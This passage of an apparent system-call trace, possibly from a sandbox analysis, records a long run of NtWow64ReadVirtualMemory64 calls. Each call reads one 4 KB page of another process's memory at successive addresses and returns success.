NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x28be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x28bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x28c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x28c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x28c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x28c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x28c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x28c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x28c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x28c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x28c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x28c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x28ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x28cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.205] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x28cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x28cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x28ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x28cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x28d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x28d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x28d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x28d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x28d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.206] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x28d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x28d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x28d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x28d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x28d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x28da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x28db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x28dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x28dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.207] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x28de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x28df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x28e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x28e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x28e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x28e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x28e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x28e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x28e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x28e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x28e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x28e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x28ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x28eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x28ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x28ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x28ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x28ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x28f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x28f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x28f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x28f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x28f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x28f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x28f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x28f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x28f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x28f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x28fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x28fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x28fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x28fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x28fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x28ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x2900000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x2901000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x2902000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x2903000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x2904000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x2905000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x2906000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x2907000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x2908000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x2909000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x290a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x290b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x290c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x290d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x290e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x290f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x2910000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x2911000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x2912000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x2913000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x2914000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x2915000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x2916000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x2917000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x2918000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x2919000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x291a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x291b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x291c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x291d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x291e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x291f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x2920000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x2921000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x2922000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x2923000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x2924000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x2925000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x2926000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x2927000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x2928000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x2929000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x292a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x292b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x292c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x292d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffe000, Buffer=0x7ff9, 